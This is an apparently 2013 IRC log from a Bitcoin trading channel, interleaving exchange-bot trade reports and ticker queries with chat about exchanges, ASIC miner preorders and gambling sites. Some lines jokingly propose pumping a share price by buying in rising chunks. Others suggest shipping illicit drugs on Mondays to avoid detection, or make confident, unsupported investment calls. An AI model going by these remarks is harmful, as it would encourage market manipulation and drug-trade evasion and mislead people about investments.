brightest idea , if you ask me Feb 11 13:37:35 i think mp recognized that and set diff futures expiration in the middle of week instead Feb 11 13:37:44 [MPEX] [S.MPOE] 10234 @ 0.00064045 = 6.5544 BTC [+] Feb 11 13:37:46 [MPEX] [S.MPOE] 4516 @ 0.00064071 = 2.8934 BTC [+] Feb 11 13:39:09 lunch, brb Feb 11 13:40:43 [MPEX] [S.MPOE] 6950 @ 0.00064071 = 4.4529 BTC [+] Feb 11 13:41:26 yeah i could have done limits Feb 11 13:41:29 and i plan on it Feb 11 13:41:35 but i figured i'd just get in Feb 11 13:41:41 i can't wait for the end of this month Feb 11 13:41:50 see how dividends go, and hopefully options are good Feb 11 13:42:54 so no one has used camp bx? they have a pretty cool platform Feb 11 13:44:06 allow hidden orders, dark pool Feb 11 13:53:24 [MPEX] [S.MPOE] 4534 @ 0.00064071 = 2.905 BTC [+] Feb 11 13:54:45 anyone wanna play street fighter iv for bitcoins' Feb 11 13:56:34 [MPEX] [S.MPOE] 2167 @ 0.00064071 = 1.3884 BTC [+] Feb 11 13:56:39 street fighter :) Feb 11 13:57:22 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 11 14:00:50 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 11 14:02:00 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [+] Feb 11 14:03:41 [MPEX] [S.MPOE] 1099 @ 0.00064071 = 0.7041 BTC [+] Feb 11 14:03:42 [MPEX] [S.MPOE] 13101 @ 0.00063861 = 8.3664 BTC [-] Feb 11 14:06:27 [MPEX] [S.MPOE] 6348 @ 0.00063861 = 4.0539 BTC [-] Feb 11 14:21:56 [MPEX] [S.MPOE] 11901 @ 0.00063861 = 7.6001 BTC [-] Feb 11 14:21:57 If you are pretty confident bitcoins are just going to generally keep going up and up, are options of much use, or are they generally mostly useful if you are uncertain thus want to hedge against your uncertainty? Feb 11 14:21:58 [MPEX] [S.MPOE] 1140 @ 0.00063775 = 0.727 BTC [-] Feb 11 14:25:27 [MPEX] [S.DICE] 700 @ 0.00628703 = 4.4009 BTC [-] Feb 11 14:25:31 [MPEX] [S.DICE] 8250 @ 0.00623001 = 51.3976 BTC [-] Feb 11 14:25:33 [MPEX] [S.DICE] 1589 @ 0.00623 = 9.8995 BTC [-] Feb 11 14:25:35 [MPEX] [S.DICE] 1989 @ 0.00621542 = 12.3625 BTC [-] Feb 11 14:25:36 [MPEX] [S.DICE] 500 @ 0.00610083 = 3.0504 BTC [-] Feb 11 14:25:42 [MPEX] [S.DICE] 2300 @ 0.00610082 = 14.0319 BTC [-] Feb 11 14:25:44 [MPEX] [S.DICE] 1050 @ 0.0060723 = 6.3759 BTC [-] Feb 11 14:25:45 [MPEX] [S.DICE] 2000 @ 0.006 = 12 BTC [-] Feb 11 14:29:05 snow and frost here too...but also full sunshine :D Feb 11 14:30:03 [MPEX] [S.MPOE] 4600 @ 0.00063825 = 2.936 BTC [+] Feb 11 14:33:49 [MPEX] [S.DICE] 100 @ 0.00580003 = 0.58 BTC [-] Feb 11 14:33:51 [MPEX] [S.DICE] 15481 @ 0.0058 = 89.7898 BTC [-] Feb 11 14:33:51 [MPEX] [S.DICE] 1000 @ 0.00570008 = 5.7001 BTC [-] Feb 11 14:33:53 [MPEX] [S.DICE] 1000 @ 0.00556183 = 5.5618 BTC [-] Feb 11 14:40:59 [MPEX] [S.MPOE] 1300 @ 0.00063825 = 0.8297 BTC [+] Feb 11 14:41:03 [MPEX] [S.MPOE] 19460 @ 0.00063775 = 12.4106 BTC [-] Feb 11 14:41:20 nice eskimo, do you have a handicap or just play for fun? Feb 11 14:43:34 bithub wanna play sfiv Feb 11 14:43:50 i have the best blanka around! Feb 11 14:49:03 nice Feb 11 14:49:21 hoping to buy some custom fitted clubs this year Feb 11 14:49:43 lol at pope, i did not even know they could quit Feb 11 14:51:04 [MPEX] [S.MPOE] 5190 @ 0.00063332 = 3.2869 BTC [-] Feb 11 14:51:11 [MPEX] [S.MPOE] 360 @ 0.00063615 = 0.229 BTC [+] Feb 11 14:53:52 mustve screwed the wrong nun Feb 11 14:54:22 yeah? Feb 11 14:54:28 was thinking to get ping irons Feb 11 14:54:37 haven't heard of blades, sounds good tho haha Feb 11 14:57:49 [MPEX] [S.MPOE] 7098 @ 0.00063615 = 4.5154 BTC [+] Feb 11 15:01:49 [MPEX] [S.MPOE] 7622 @ 0.00063615 = 4.8487 BTC [+] Feb 11 15:03:54 haha, pass Feb 11 15:04:07 its like playing with a 1iron every shot Feb 11 15:05:59 ;;market buy 25000 Feb 11 15:06:01 A market order to buy 25000 bitcoins right now would take 673080.6320 USD and would take the last price up to 31.3000 USD, resulting in an average price of 26.9232 USD/BTC. Feb 11 15:08:54 we were active until the SEC made it clear they were doing their thing Feb 11 15:09:16 and when i say we i mean myself and my lawyers, no one else wanted to join in. Feb 11 15:09:47 they waited for pirated to pay, and then either gave up or joined the SEC Feb 11 15:11:35 ;;market buy 100000 Feb 11 15:11:37 This order would exceed the size of the order book. You would buy 69622.631 bitcoins, for a total of 16223006162626.1738 USD and take the price to 13370133701337.0000. Feb 11 15:12:02 wow, not even 100k for sale. Feb 11 15:17:22 [MPEX] [S.MPOE] 13700 @ 0.00063306 = 8.6729 BTC [-] Feb 11 15:26:31 [MPEX] [S.MPOE] 5700 @ 0.00063615 = 3.6261 BTC [+] Feb 11 15:36:12 everyone is harping about mtgox... meanwhile on bitstamp there are btc to be had at 23.70 still Feb 11 15:36:53 [MPEX] [S.MPOE] 6720 @ 0.00063615 = 4.2749 BTC [+] Feb 11 15:36:54 [MPEX] [S.MPOE] 6580 @ 0.0006368 = 4.1901 BTC [+] Feb 11 15:37:08 i just sent a few k eurs to stamp :p Feb 11 15:37:20 should be there in a few hours Feb 11 15:38:13 yup Feb 11 15:39:31 no circus Feb 11 15:39:56 EskimoBob, i usually get euros on next day, too Feb 11 15:40:13 yes Feb 11 15:42:04 im not sure why you bothered with mt gox lol Feb 11 15:42:11 lol i'm raving about it like 5th time around here Feb 11 15:42:13 you must enjoy pain:) Feb 11 15:43:13 [MPEX] [S.MPOE] 9636 @ 0.0006368 = 6.1362 BTC [+] Feb 11 15:49:05 slovenia will grow larger! Feb 11 15:49:48 y sad face Feb 11 15:49:59 cause? Feb 11 15:50:21 right. Feb 11 15:50:24 you have no clue :) Feb 11 15:51:46 https://bitcointalk.org/index.php?topic=141638.0 Feb 11 15:52:04 ah nvm this is old Feb 11 15:52:08 apparently new to me Feb 11 15:56:47 [MPEX] [S.MPOE] 22000 @ 0.0006368 = 14.0096 BTC [+] Feb 11 16:00:49 [MPEX] [S.MPOE] 5563 @ 0.0006368 = 3.5425 BTC [+] Feb 11 16:04:41 [MPEX] [S.MPOE] 3984 @ 0.00063306 = 2.5221 BTC [-] Feb 11 16:04:44 [MPEX] [S.MPOE] 4116 @ 0.00063301 = 2.6055 BTC [-] Feb 11 16:06:44 [BTCTC] [S.MPOE-PT] 100 @ 0.0007 = 0.07 BTC Feb 11 16:08:01 [MPEX] [S.MPOE] 4050 @ 0.0006368 = 2.579 BTC [+] Feb 11 16:13:24 lol bitcoiners got so used to services abruptly ceasing operation Feb 11 16:13:44 i got trivial password reset inquiry email, ended with "Hope you are still up and running." Feb 11 16:14:14 [MPEX] [S.MPOE] 8284 @ 0.00063301 = 5.2439 BTC [-] Feb 11 16:14:16 [MPEX] [S.MPOE] 5616 @ 0.00063186 = 3.5485 BTC [-] Feb 11 16:15:17 jurov its crazy like that though Feb 11 16:16:25 [MPEX] [S.MPOE] 11121 @ 0.0006368 = 7.0819 BTC [+] Feb 11 16:29:15 [MPEX] [S.MPOE] 17100 @ 0.00063807 = 10.911 BTC [+] Feb 11 16:29:17 [MPEX] [S.MPOE] 2150 @ 0.00064072 = 1.3775 BTC [+] Feb 11 16:29:27 [MPEX] [S.MPOE] 2500 @ 0.00064094 = 1.6024 BTC [+] Feb 11 16:29:29 [MPEX] [S.MPOE] 6676 @ 0.00064173 = 4.2842 BTC [+] Feb 11 16:29:29 [MPEX] [S.MPOE] 29700 @ 0.000642 = 19.0674 BTC [+] Feb 11 16:29:37 [MPEX] [S.MPOE] 10474 @ 0.00064285 = 6.7332 BTC [+] Feb 11 16:40:35 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 11 16:41:40 [MPEX] [S.MPOE] 14250 @ 0.0006373 = 9.0815 BTC [-] Feb 11 16:41:52 BREAKING NEWS - http://abcnews.go.com/Health/florida-couple-addicted-coffee-enemas/story?id=18433235 Feb 11 16:48:12 [MPEX] [S.MPOE] 426 @ 0.00064285 = 0.2739 BTC [+] Feb 11 16:48:14 [MPEX] [S.MPOE] 5131 @ 0.00064304 = 3.2994 BTC [+] Feb 11 16:48:15 [MPEX] [S.MPOE] 4050 @ 0.00064307 = 2.6044 BTC [+] Feb 11 16:48:16 [MPEX] [S.MPOE] 4893 @ 0.00064364 = 3.1493 BTC [+] Feb 11 16:48:42 so it's like yuppie meth? Feb 11 16:48:56 people... Feb 11 16:52:37 ;;asks 25 Feb 11 16:52:39 There are currently 10748.003 bitcoins offered at or under 25.0 USD, worth 265154.999149 USD in total. Feb 11 17:06:25 [MPEX] [S.MPOE] 12700 @ 0.0006373 = 8.0937 BTC [-] Feb 11 17:11:57 ;;slap Chaang-Noi Feb 11 17:12:51 not a sweet double babboon? Feb 11 17:13:01 lol, what was that for! :) Feb 11 17:13:28 don't mind jcpham, that's just his way of saying hello Feb 11 17:13:43 :) Feb 11 17:13:51 yes i was saying hello Feb 11 17:13:58 hello all! Feb 11 17:14:11 [MPEX] [S.MPOE] 16000 @ 0.00063909 = 10.2254 BTC [+] Feb 11 17:15:12 sadly it is my bed time so i must say good night:) Feb 11 17:16:01 buh bye Feb 11 17:16:29 [MPEX] [S.MPOE] 3210 @ 0.00063909 = 2.0515 BTC [+] Feb 11 17:16:31 [MPEX] [S.MPOE] 7004 @ 0.00063949 = 4.479 BTC [+] Feb 11 17:18:24 bye jcpham Feb 11 17:25:49 http://www.zerohedge.com/news/2013-02-11/too-much-european-integration-romanian-donkey-meat-uk-beef-burgers Feb 11 17:25:52 lol Feb 11 17:28:33 [MPEX] [S.MPOE] 20050 @ 0.0006438 = 12.9082 BTC [+] Feb 11 17:32:22 [MPEX] [S.MPOE] 7050 @ 0.0006438 = 4.5388 BTC [+] Feb 11 17:32:24 [MPEX] [S.MPOE] 9450 @ 0.0006441 = 6.0867 BTC [+] Feb 11 17:36:54 [MPEX] [S.MPOE] 17700 @ 0.00064313 = 11.3834 BTC [-] Feb 11 17:39:46 [MPEX] [S.MPOE] 5400 @ 0.00064313 = 3.4729 BTC [-] Feb 11 17:41:41 [MPEX] [S.MPOE] 11600 @ 0.0006441 = 7.4716 BTC [+] Feb 11 17:44:33 [MPEX] [S.MPOE] 2600 @ 0.0006441 = 1.6747 BTC [+] Feb 11 17:44:35 [MPEX] [S.MPOE] 9986 @ 0.00064445 = 6.4355 BTC [+] Feb 11 17:50:31 ;;asks 24 Feb 11 17:50:32 There are currently 896.14344 bitcoins offered at or under 24.0 USD, worth 21450.3202049 USD in total. Feb 11 17:50:59 ;;bids 23.9 Feb 11 17:51:01 There are currently 1.9573856 bitcoins demanded at or over 23.9 USD, worth 46.7875594469 USD in total. Feb 11 17:52:01 ;;ticker Feb 11 17:52:02 BTCUSD ticker | Best bid: 23.88490, Best ask: 23.91835, Bid-ask spread: 0.03345, Last trade: 23.91835, 24 hour volume: 30876.24546559, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.87169 Feb 11 18:04:40 [MPEX] [S.MPOE] 514 @ 0.00064445 = 0.3312 BTC [+] Feb 11 18:04:42 [MPEX] [S.MPOE] 5200 @ 0.0006446 = 3.3519 BTC [+] Feb 11 18:04:43 [MPEX] [S.MPOE] 3154 @ 0.00064485 = 2.0339 BTC [+] Feb 11 18:08:15 I wonder at what BTC value people start complaining about wallet-to-wallet transaction fees Feb 11 18:13:54 [MPEX] [S.MPOE] 9106 @ 0.00064313 = 5.8563 BTC [-] Feb 11 18:14:03 [MPEX] [S.MPOE] 17712 @ 0.00064351 = 11.3978 BTC [+] Feb 11 18:14:12 [MPEX] [S.MPOE] 5983 @ 0.0006451 = 3.8596 BTC [+] Feb 11 18:14:14 [MPEX] [S.MPOE] 5150 @ 0.00064526 = 3.3231 BTC [+] Feb 11 18:14:16 [MPEX] [S.MPOE] 22721 @ 0.00064544 = 14.665 BTC [+] Feb 11 18:14:20 [MPEX] [S.MPOE] 16586 @ 0.00064556 = 10.7073 BTC [+] Feb 11 18:14:21 [MPEX] [S.MPOE] 5987 @ 0.00064581 = 3.8665 BTC [+] Feb 11 18:14:29 [MPEX] [S.MPOE] 22713 @ 0.00064621 = 14.6774 BTC [+] Feb 11 18:14:34 [MPEX] [S.MPOE] 8936 @ 0.00064662 = 5.7782 BTC [+] Feb 11 18:14:36 [MPEX] [S.MPOE] 14784 @ 0.00064698 = 9.565 BTC [+] Feb 11 18:14:37 [MPEX] [S.MPOE] 6324 @ 0.00064708 = 4.0921 BTC [+] Feb 11 18:14:39 [MPEX] [S.MPOE] 6300 @ 0.00064721 = 4.0774 BTC [+] Feb 11 18:14:43 [MPEX] [S.MPOE] 30450 @ 0.00064784 = 19.7267 BTC [+] Feb 11 18:14:52 [MPEX] [S.MPOE] 52462 @ 0.0006479 = 33.9901 BTC [+] Feb 11 18:16:21 [MPEX] [S.MPOE] 4180 @ 0.0006479 = 2.7082 BTC [+] Feb 11 18:31:06 [MPEX] [S.MPOE] 7700 @ 0.00064619 = 4.9757 BTC [-] Feb 11 18:31:26 ;;calc 1000*.0005 Feb 11 18:31:27 0.5 Feb 11 18:32:31 ;;calc 1000000000000000/11000000 Feb 11 18:32:31 90909090.9091 Feb 11 18:32:57 ;;calc 90909090*.0005 Feb 11 18:32:58 45454.545 Feb 11 18:33:08 HEH Feb 11 18:33:51 ;;calc 90909090*.00000001 Feb 11 18:33:51 0.9090909 Feb 11 18:34:20 \o/ Feb 11 18:35:01 [MPEX] [S.MPOE] 10800 @ 0.00064619 = 6.9789 BTC [-] Feb 11 18:35:04 [MPEX] [S.MPOE] 8238 @ 0.00064313 = 5.2981 BTC [-] Feb 11 18:36:06 ;;bc,convert shenanigans Feb 11 18:36:07 1 BTC = Google's calculator didn't come up with anything. Feb 11 18:36:21 ;;slap assbot Feb 11 18:41:36 [MPEX] [S.MPOE] 1742 @ 0.00064313 = 1.1203 BTC [-] Feb 11 18:41:38 [MPEX] [S.MPOE] 4906 @ 0.00064217 = 3.1505 BTC [-] Feb 11 18:41:49 [MPEX] [S.MPOE] 4943 @ 0.00063782 = 3.1527 BTC [-] Feb 11 18:45:54 [MPEX] [S.DICE] 1950 @ 0.00595054 = 11.6036 BTC [+] Feb 11 18:49:41 [MPEX] [S.MPOE] 1357 @ 0.00063782 = 0.8655 BTC [-] Feb 11 18:49:45 [MPEX] [S.MPOE] 6943 @ 0.0006373 = 4.4248 BTC [-] Feb 11 18:59:16 [MPEX] [S.MPOE] 1200 @ 0.0006479 = 0.7775 BTC [+] Feb 11 19:01:09 ;;ticker Feb 11 19:01:09 BTCUSD ticker | Best bid: 23.84588, Best ask: 23.88000, Bid-ask spread: 0.03412, Last trade: 23.84587, 24 hour volume: 30125.82192065, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.89098 Feb 11 19:02:26 [MPEX] [S.MPOE] 11250 @ 0.000644 = 7.245 BTC [-] Feb 11 19:03:04 [MPEX] [S.MPOE] 21808 @ 0.0006479 = 14.1294 BTC [+] Feb 11 19:03:06 [MPEX] [S.MPOE] 14492 @ 0.00064981 = 9.417 BTC [+] Feb 11 19:05:12 [MPEX] [S.MPOE] 3908 @ 0.00064981 = 2.5395 BTC [+] Feb 11 19:05:14 [MPEX] [S.MPOE] 4300 @ 0.00064995 = 2.7948 BTC [+] Feb 11 19:05:16 [MPEX] [S.MPOE] 8103 @ 0.0006506 = 5.2718 BTC [+] Feb 11 19:09:24 ;;slap gribble Feb 11 19:09:59 ;;slap DeadWeasel Feb 11 19:10:15 ! Feb 11 19:15:25 [MPEX] [S.MPOE] 5283 @ 0.000644 = 3.4023 BTC [-] Feb 11 19:16:03 S&M gribble Feb 11 19:16:11 ;;slap DeadWeasel Feb 11 19:21:57 [MPEX] [S.MPOE] 4106 @ 0.00064299 = 2.6401 BTC [-] Feb 11 19:36:01 [MPEX] [S.MPOE] 11094 @ 0.00064661 = 7.1735 BTC [+] Feb 11 19:38:39 hatefest on #bitcon-otc Feb 11 19:38:54 Mircea Popescu, the Bill Gates of Bitcoin. (if billg had porn on microsoft.com) Feb 11 19:40:31 BTCUSD ticker | Best bid: 23.96320, Best ask: 23.99677, Bid-ask spread: 0.03357, Last trade: 23.99677, 24 hour volume: 30284.73846546, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.89730 Feb 11 19:42:51 30k volume, not very high. Feb 11 19:44:35 24.19! Feb 11 19:48:03 !! Feb 11 19:48:18 ;;ticker Feb 11 19:48:19 BTCUSD ticker | Best bid: 23.99964, Best ask: 24.03327, Bid-ask spread: 0.03363, Last trade: 24.06130, 24 hour volume: 30690.91383549, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.90079 Feb 11 19:48:37 350 bitcoins took us there from 23.96 Feb 11 19:49:21 [MPEX] [S.MPOE] 7606 @ 0.00064456 = 4.9025 BTC [-] Feb 11 19:49:23 [MPEX] [S.MPOE] 20694 @ 0.00064757 = 13.4008 BTC [+] Feb 11 19:49:58 would anyone recommend S.BBET? Feb 11 19:50:42 depends what price you get it for Feb 11 19:51:29 you should take EskimoBob's advice and "be your own whale" to pump up the price some ;) Feb 11 19:52:09 So that would require buying say, 300 shares, than buying at successively higher prices at junks of 100 shares? Feb 11 19:52:29 thus creating a market for a 'rising' asset? Feb 11 19:53:08 might as well start bidding on those asicminer shares then Feb 11 19:55:45 no i mean make a bunch of big bets Feb 11 19:57:19 again? mass hysteria ensues :) Feb 11 19:59:11 oh, sdice whale Feb 11 19:59:11 ;;ticker Feb 11 19:59:12 BTCUSD ticker | Best bid: 24.05905, Best ask: 24.08999, Bid-ask spread: 0.03094, Last trade: 24.05904, 24 hour volume: 30755.51651899, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.90272 Feb 11 19:59:20 that's not an option for me Feb 11 19:59:33 because it's not profitable Feb 11 20:02:23 ;;ticker Feb 11 20:02:24 BTCUSD ticker | Best bid: 24.05767, Best ask: 24.09136, Bid-ask spread: 0.03369, Last trade: 24.05768, 24 hour volume: 30812.67850009, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.90315 Feb 11 20:07:05 [MPEX] [S.MPOE] 14112 @ 0.0006373 = 8.9936 BTC [-] Feb 11 20:07:12 [MPEX] [S.MPOE] 19150 @ 0.00063714 = 12.2012 BTC [-] Feb 11 20:08:36 ohmagherd it's dead in here today Feb 11 20:08:43 ;;slap deadweasel Feb 11 20:12:46 I do need to do that, EskimoBob. Feb 11 20:13:11 I'm just teaching myself to program now. It's slow as I have a full time job. Feb 11 20:15:35 [MPEX] [S.MPOE] 4238 @ 0.00063647 = 2.6974 BTC [-] Feb 11 20:15:37 [MPEX] [S.MPOE] 1490 @ 0.00064757 = 0.9649 BTC [+] Feb 11 20:15:38 [MPEX] [S.MPOE] 11067 @ 0.00065011 = 7.1948 BTC [+] Feb 11 20:16:54 [MPEX] [S.MPOE] 9099 @ 0.00063186 = 5.7493 BTC [-] Feb 11 20:16:56 [MPEX] [S.MPOE] 5217 @ 0.00063111 = 3.2925 BTC [-] Feb 11 20:16:58 [MPEX] [S.MPOE] 14053 @ 0.0006311 = 8.8688 BTC [-] Feb 11 20:17:00 [MPEX] [S.MPOE] 2831 @ 0.00063054 = 1.7851 BTC [-] Feb 11 20:17:20 ;;ticker Feb 11 20:17:20 BTCUSD ticker | Best bid: 24.21001, Best ask: 24.27700, Bid-ask spread: 0.06699, Last trade: 24.21001, 24 hour volume: 30932.81371951, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.91140 Feb 11 20:17:39 ;;bc,covert eur Feb 11 20:17:40 Error: "bc,covert" is not a valid command. Feb 11 20:17:45 ;;bc,convert eur Feb 11 20:17:45 1 BTC = 24.21001 U.S. dollars = 18.0806647 Euros Feb 11 20:18:05 Ka-ching Feb 11 20:18:23 this does not seem stable with such low volume. Feb 11 20:18:42 deposits flushed. Feb 11 20:18:42 single user pump and dump? Feb 11 20:19:25 and it looks like there is .5 BTC bot pushing down on the price.... Feb 11 20:20:27 yeah doing a great job of pushing it down too Feb 11 20:20:40 lol, no. Feb 11 20:21:06 I wonder how many SR users are waiting to get to the bank today, after being snowed in all weekend. Feb 11 20:21:36 i know they are out of Oxycotin already. 3 day weekend. Feb 11 20:21:41 and another one coming up! Feb 11 20:23:54 what's oxycotin even for ? Feb 11 20:24:23 pain Feb 11 20:24:37 addicts, the foundation of bitcoin. Feb 11 20:24:38 oxycontin& Feb 11 20:24:55 or oxycodone Feb 11 20:25:00 i think that's as good as it gets. If porn can create the internet then addicts can create a new currencyu. Feb 11 20:25:12 EskimoBob: no Feb 11 20:25:29 this entire "sr drives bitcoin" is about as stupid as people thinking cowboy movies drove the us west. Feb 11 20:25:57 it's certainly "helping" tho Feb 11 20:26:07 well sure. Feb 11 20:26:25 the best part about SR users is they dont care what the echange rate is Feb 11 20:26:38 there is more activity on SR and their forums than any other bitcoin related activity Feb 11 20:26:52 gambling is huge too, but they are more likely to stop at a certain point Feb 11 20:27:08 DeadWeasel activity on a forum is a very poor representation of anything. Feb 11 20:27:29 it is, that's why it's another solid corner of the pyramind Feb 11 20:27:38 the SR thing can't last Feb 11 20:27:58 where does that "if bitcoin goes up,gambling/sd will subside" come from? Feb 11 20:27:58 at least not in the US... Feb 11 20:28:20 ThickAsThieves: it also can't be stopped, unless they open every package of mail, which is illegal if it's US POST Feb 11 20:28:29 USPS is stopping deliveries on Saturdays soon Feb 11 20:28:40 all those drugs just sitting all weekend Feb 11 20:29:39 many of the drugs could be sniffed out Feb 11 20:29:42 https://bitcointalk.org/index.php?topic=77870.msg1519243#msg1519243 one of the sd whales ? Feb 11 20:29:49 they're stopping due to a lack of budget. I doubt they'll hire drug dogs to hang out on weekends. Feb 11 20:29:50 but you are right, it cant stop entirely Feb 11 20:30:05 1 BTC = 24.26943 U.S. dollars = 18.1142185 Euros Feb 11 20:30:13 USPS budget isnt where dogs come from Feb 11 20:30:56 people could just ship on Mondays and be safer Feb 11 20:31:11 anywho idc Feb 11 20:31:23 legalize it all Feb 11 20:31:32 Imagine the organization it would take to determine exactly which package is was. Feb 11 20:31:41 ThickAsThieves: i agree, Feb 11 20:31:55 let them OD or not, either way, drug issues sort themselves out. Feb 11 20:33:29 mp, that guy on your link's last post is inquiring about buying a harley for 450btc, maybe he IS a whale Feb 11 20:33:56 is a harley that cheap ? Feb 11 20:34:48 some are Feb 11 20:34:49 he def bets a lot Feb 11 20:34:50 used maybe Feb 11 20:34:55 a girls Harley is Feb 11 20:35:01 a sporster Feb 11 20:35:11 yeah i was going to say a sportster Feb 11 20:35:26 you can tack on enough extra to make it not cheap though Feb 11 20:35:54 http://www.motorcyclenews.com/upload/218277/images/Sportster.jpg Feb 11 20:35:58 wtf is this thing. seriously. Feb 11 20:35:58 he's also buying BFL preorders Feb 11 20:36:19 looks like a husqvarna Feb 11 20:36:42 [MPEX] [S.MPOE] 12450 @ 0.00063768 = 7.9391 BTC [+] Feb 11 20:36:44 [MPEX] [S.MPOE] 348 @ 0.00064263 = 0.2236 BTC [+] Feb 11 20:36:56 [MPEX] [S.DICE] 200 @ 0.00609434 = 1.2189 BTC [+] Feb 11 20:36:59 anyone has an inside about BFL preorders? Feb 11 20:37:25 you should know Feb 11 20:37:33 i ride an expatriated romanian mule mostly Feb 11 20:37:33 info on their forum says that the chips will arrive at bumping facility today or tomorrow Feb 11 20:37:42 jcpham as long as its not an ass Feb 11 20:38:02 Chilca http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Feb 11 20:38:04 could go either way. Feb 11 20:38:20 Yea, I saw in the forum!, Thanks mircea_popescu Feb 11 20:38:45 we bought a few Feb 11 20:39:16 That bet has a weird qualifier in it Feb 11 20:39:23 Devices must be in scope of +-10% of advertised performance in order to be accepted as valid. Feb 11 20:39:31 what's weird about that ? Feb 11 20:39:32 what if the devices are 11% faster than spec'd? Feb 11 20:40:13 i defy you to deliver any sort of item, no matter what it be, from potatoes or crude oil to combustion engines or lcd monitors Feb 11 20:40:20 that's NOT within 10% and still have it accepted. Feb 11 20:40:39 my point is, Feb 11 20:40:41 10% is, if anything, mindboggling generous. Feb 11 20:40:48 what if BFL makes them FASTER Feb 11 20:40:48 they deliver what they say or they fail. Feb 11 20:40:52 doesn't matter. Feb 11 20:41:04 production is about doing what you want, not what comes out. Feb 11 20:41:35 so if their devices all have a bonus speed of 11%, and ship on time, they still failed to meet the qualitifications? Feb 11 20:41:48 *deliver on time Feb 11 20:42:16 qualitifiations, heh Feb 11 20:42:21 lol Feb 11 20:42:37 [MPEX] [S.MPOE] 7150 @ 0.00063083 = 4.5104 BTC [-] Feb 11 20:42:38 [MPEX] [S.MPOE] 12455 @ 0.00063054 = 7.8534 BTC [-] Feb 11 20:42:43 [MPEX] [S.MPOE] 6445 @ 0.00062986 = 4.0594 BTC [-] Feb 11 20:43:00 anyway, if they deliver by 1st of march they're grossly NOT on time Feb 11 20:43:09 as the things were supposed to come out in november last or something like that. Feb 11 20:43:14 indeed Feb 11 20:43:27 but yes, if they specced 66 and deliver 73 they lose. Feb 11 20:43:33 bfl started a YEAR before everyone else Feb 11 20:43:42 they are REALLY late Feb 11 20:43:58 i ordered a couple a month ago, I just wanna own em, not worried if they make the money Feb 11 20:44:08 I surmise that over time theyll be worth it anyway Feb 11 20:44:16 ThickAsThieves: nope Feb 11 20:44:18 ThickAsThieves one angle i think most people fail to grok is that Feb 11 20:44:26 asicminer will fuck over difficulty for everyone else Feb 11 20:44:28 once btc takes over, these fabled early asics will sell at sotheby's Feb 11 20:44:29 (for btc) Feb 11 20:44:33 last time i checked inaba was making exuses they will likely fail their power req. and lose the bet they made publicly Feb 11 20:44:57 inaba making excuses? no! Feb 11 20:44:57 kakobreklaa last time i heard of him he was getting owned by the girl Feb 11 20:44:58 ThickAsThieves: btw, I suggest you bid on more asicminer shares if you plan on making any money Feb 11 20:45:03 SD about to cross 3 million bets Feb 11 20:45:08 ;;ticker Feb 11 20:45:09 BTCUSD ticker | Best bid: 24.20309, Best ask: 24.23694, Bid-ask spread: 0.03385, Last trade: 24.23694, 24 hour volume: 31171.64310858, 24 hour low: 23.19000, 24 hour high: 24.37345, 24 hour vwap: 23.91775 Feb 11 20:45:15 i wonder if it ever goes over 1bn bets Feb 11 20:45:45 diablo, I might, just a matter of whether I can move money around before the deadline... Feb 11 20:46:20 i hope that's a joke Feb 11 20:46:25 asicminer is MAYBE worth 0.08 atm Feb 11 20:46:34 which is still under par. Feb 11 20:46:34 [BTCTC] [COGNITIVE] 2 @ 0.3254 = 0.6508 BTC [+] Feb 11 20:46:42 mircea_popescu: lol. Feb 11 20:46:43 if there were a practical way to do it i'd short the entire float. Feb 11 20:46:44 they seem to be hinting they will go online very soon Feb 11 20:46:49 ThickAsThieves even so. Feb 11 20:47:15 I dont think mircea_popescu realizes how much hash power asicminer will end up having Feb 11 20:47:25 "end up having". Feb 11 20:47:33 how did namworld's auction go? Feb 11 20:47:41 DeadWeasel: I won half of it Feb 11 20:47:43 last i saw was .51 Feb 11 20:47:46 nice! Feb 11 20:47:46 i think he got like .35 or some ungodly thing like that Feb 11 20:47:48 o wow. Feb 11 20:47:54 if you wanna short it, buy that 5000share seat and promote your auction more than Nam Feb 11 20:48:03 god i wish i could sell 10k of those. Feb 11 20:48:16 no, to short it i'd have to borrow some and sell them. Feb 11 20:48:24 and i wouldn't promote that shit either, it's unconscionable. Feb 11 20:48:25 Diablo-D3: what was the final price? Feb 11 20:48:29 hehe Feb 11 20:48:32 DeadWeasel: see the thread Feb 11 20:48:40 some people bid like .41 right? Feb 11 20:48:44 [MPEX] [S.MPOE] 3300 @ 0.00064024 = 2.1128 BTC [+] Feb 11 20:48:55 yeah Feb 11 20:49:07 asicminer shares should go past 1 btc Feb 11 20:49:25 lol dude, srsly. Feb 11 20:49:30 also, as far as buying the BFLs I did, like I said, I just wanna own a couple miners, I have a lot of "gizmos" Feb 11 20:49:40 at work, look it up later. glad you won though Diablo-D3 Feb 11 20:50:22 i wanna make sure I understand somehting about how the blockchain works, Feb 11 20:50:40 [MPEX] [S.MPOE] 30855 @ 0.00062986 = 19.4343 BTC [-] Feb 11 20:50:40 if bitcoin transaction volume increased like 1000x Feb 11 20:50:41 [MPEX] [S.MPOE] 11700 @ 0.00062884 = 7.3574 BTC [-] Feb 11 20:50:50 mining difficulty drops a lot right? Feb 11 20:50:51 [MPEX] [S.MPOE] 4972 @ 0.00062786 = 3.1217 BTC [-] Feb 11 20:50:53 [MPEX] [S.MPOE] 19300 @ 0.00062766 = 12.1138 BTC [-] Feb 11 20:50:57 [MPEX] [S.MPOE] 173 @ 0.00062729 = 0.1085 BTC [-] Feb 11 20:50:57 not at all. Feb 11 20:50:58 [MPEX] [S.MPOE] 950 @ 0.00062706 = 0.5957 BTC [-] Feb 11 20:51:01 I wish I had the money to buy all of asicminer Feb 11 20:51:03 all 200k shares Feb 11 20:51:13 this is why you don't have a lot of money. Feb 11 20:51:31 so how will the system deal with confirming that many transactions Feb 11 20:51:41 like what if there were 1000 satoshidice.coms Feb 11 20:51:59 ThickAsThieves blocks currently can only cointain 1mb of data 